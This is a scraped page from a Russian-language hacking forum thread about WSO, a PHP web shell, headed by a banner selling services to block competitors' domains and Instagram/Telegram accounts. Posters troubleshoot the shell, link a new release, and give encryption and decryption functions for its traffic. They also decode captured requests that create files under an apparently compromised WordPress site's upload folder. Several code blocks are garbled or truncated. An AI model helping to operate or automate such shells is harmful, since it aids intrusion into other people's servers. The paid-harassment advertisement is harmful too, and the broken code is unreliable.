УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > ИНФО > Статьи > Избранное
WSO (веб-шелл)

Страница 57 из 58

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#561

05.12.2018, 14:03

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от dragondragon

dragondragon said:
↑
Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?

PHP скомпайлили/стартовали без поддержки архивов / php-модули для архивов не установлены (php-zip) / или же нет прав на запись.

Посмотрите phpinfo чего не хватает.

#562

21.05.2019, 03:09

Jimio

Guest

Сообщений: n/a

Провел на форуме:
8218

Репутация: 0

Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается http://prntscr.com/nr5nyc, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?

#563

21.05.2019, 12:45

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от Jimio

Jimio said:
↑
Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается
http://prntscr.com/nr5nyc
, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?

Так в чём ошибка то?

#564

21.05.2019, 12:58

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

https://www.php.net/manual/ru/function.mysql-query.php

Код:

Code:
function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }

Цитата:

Сообщение от None

Внимание
Данное расширение устарело, начиная с версии PHP 5.5.0, и удалено в PHP 7.0.0. Используйте вместо него
MySQLi
или
PDO_MySQL
. Смотрите также инструкцию
MySQL: выбор API
и
соответствующий FAQ
для получения более подробной информации. Альтернативы для данной функции:

__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..

#565

22.05.2019, 18:54

I_I

Guest

Сообщений: n/a

Провел на форуме:
16668

Репутация: 1

oRb ты еще живой?

#566

22.05.2019, 23:36

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от I_I

I_I said:
↑
oRb
ты еще живой?

Живой!!! но в других темах...

P.S: Сами патчити!

#567

02.02.2020, 04:32

I_I

Guest

Сообщений: n/a

Провел на форуме:
16668

Репутация: 1

Новый wso 3 дня назад вышел

https://github.com/twepl/wso

#568

04.04.2020, 15:32

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от wpbrut

wpbrut said:
↑
ребят, подскажите пожалуйста:
- если управлять шеллом через GET POST запросы, то в WSO 2.5 через Fiddler можно нормально отследить передаваемые данные
проблема в том, что WSO 2.5 морально устарел и на многих пыхах частенько не открывается
приходится юзать WSO 4.2.5
но WSO 4.2.5 при тех же запросах кодирует данные
допустим слово "FilesMan" - "CwApCRQcJXoXA31K"
и уже просто так отправить запрос не получается
нужно передаваемые данные закодировать
как кодируются данные в WSO 4.2.5?
пример WSO 4.2.5
https://github.com/tennc/webshell/bl.../wso-4.2.5.php
подскажите плз
заранее благодарен

Вот функция разшифровки:

Код:

Code:
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование

[CODE]
Code:
function encrypt(str,pwd){if(pwd==null||pwd.length=str.leng th)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl =string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|1 28);}else{enc=String.fromCharCode((c1>>12)|224)+St ring.fromCharCode(((c1>>6)&63)|128)+String.fromCha rCode((c1&63)|128);}if(enc!==null){if(end>start){u tftext+=string.slice(start,end);}utftext+=enc;star t=end=n+1;}}if(end>start){utftext+=string.slice(st art,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCod eAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeA t(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6 &0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64. charAt(h4);}while(i

#569

29.04.2020, 00:00

VulturRe

Guest

Сообщений: n/a

Провел на форуме:
17896

Репутация: 0

[QUOTE="fandor9"]
fandor9 said:
↑
Вот функция разшифровки:

Код:

Code:
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование

Код:

Code:
function encrypt(str,pwd){if(pwd==null||pwd.length=str.length)break;}}return base64_encode(enc_str);}
    function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
    function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i=strlen($str))break;}}return base64_decode($enc_str);}

А вот шифрование
[CODE]
Code:
function encrypt(str,pwd){if(pwd==null||pwd.length=str.leng th)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl =string.length;for(var n=0;n127&&c1>6)|192)+String.fromCharCode((c1&63)|1 28);}else{enc=String.fromCharCode((c1>>12)|224)+St ring.fromCharCode(((c1>>6)&63)|128)+String.fromCha rCode((c1&63)|128);}if(enc!==null){if(end>start){u tftext+=string.slice(start,end);}utftext+=enc;star t=end=n+1;}}if(end>start){utftext+=string.slice(st art,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCod eAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeA t(i++);bits=o1>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6 &0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64. charAt(h4);}while(i

#570

29.04.2020, 13:22

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от VulturRe

VulturRe said:
↑
а зачем такая заморочка при автоматизации работы с новыми шелами?
560c6f5b685947113ec71a03d59277fb 21232f297a57a5a743894a0e4a801fc3 /wp-content/uploads/2020/04/1/
560c6f5b685947113ec71a03d59277fbkey bc5bf2385512f2fbb9c7481bce116923 /wp-content/uploads/2020/04/
560c6f5b685947113ec71a03d59277fb 188162e90b88271030885b3bd7cfd523 /wp-content/uploads/2020/04/
a=CwAhQgM1FywvSF5CLSN4RA%3D%3D&
c=FV8lRzs6DA8sLR9dLGY9ETstHxs6JR9cOz0PWhd2Llk7ZSIO KWcYQRRYdEg9KhtEPS5gSC49H0cXAxcDFhADGhQHCEMUPjJGAh d%2BVA%3D%3D&
p1=PSobAQM1CxUBFCVeLRV4RA%3D%3D&p2=Ozo5XDg6IRU%3D&
p3=&
charset=UTF-8
вот первые строки с куками и данные которые шифруются как понять ключ в куках?

Ключ в куках : 560c6f5b685947113ec71a03d59277fbkey имеет значение bc5bf2385512f2fbb9c7481bce116923.

Вот вам функция расшифровке в JS

Код:

Code:
function decrypt(cipher,pwd){ 
key = btoa(pwd); 
console.log("Key="+key+" length="+key.length); 
str_cipher = atob(unescape(cipher)); 
console.log("Encrypted string = "+str_cipher+" length="+str_cipher.length); 
enc_chr = ""; 
enc_str=""; 
i=0; 
while(i str_cipher.length){
            console.log("True");break;
        }
   }
}
return atob(enc_str);
}

тоесть что-бы расшифровать значение а, передаёте

Код:

Code:
decrypt("CwAhQgM1FywvSF5CLSN4RA%3D%3D","bc5bf2385512f2fbb9c7481bce116923")

и получаете "FilesTools".

а = "FilesTools"

c="/home/ileolahe/public_html/wp-content/uploads/2020/04/1/"

p1="tetete.php"

p2="mkfile"

Страница 57 из 58

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Веб 2.0 и Веб 3.0. Будущее Интернета.	SK \| Heaton	Мировые новости. Обсуждения.	5	13.06.2007 02:07
Переделанный шелл!	k1b0rg	PHP	33	03.04.2007 08:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход